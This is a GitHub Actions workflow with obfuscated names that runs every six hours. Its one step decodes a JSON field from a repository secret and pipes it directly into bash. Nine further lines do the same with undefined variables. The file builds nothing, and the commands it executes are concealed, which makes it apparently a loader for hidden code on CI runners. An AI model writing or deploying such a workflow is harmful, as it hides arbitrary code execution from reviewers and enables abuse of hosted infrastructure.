name: lijun19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '36 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lijun19871010
        env:
          rrp86737: ${{ secrets.rrp86737 }}
        run: |
          echo $rrp86737 | jq -r .adkq506 | /bin/bash
          echo $brq14 | jq -r .lbsrb5 | /bin/bash
          echo $wrd296 | jq -r .mymaz6 | /bin/bash
          echo $jcx370 | jq -r .gkrop022 | /bin/bash
          echo $f5 | jq -r .fwvx6216 | /bin/bash
          echo $opbif27306 | jq -r .z53732 | /bin/bash
          echo $l9 | jq -r .ivnm89 | /bin/bash
          echo $z4985 | jq -r .fhseq210 | /bin/bash
          echo $g1804 | jq -r .joxno81806 | /bin/bash
          echo $pplvb63 | jq -r .rzeb18670 | /bin/bash

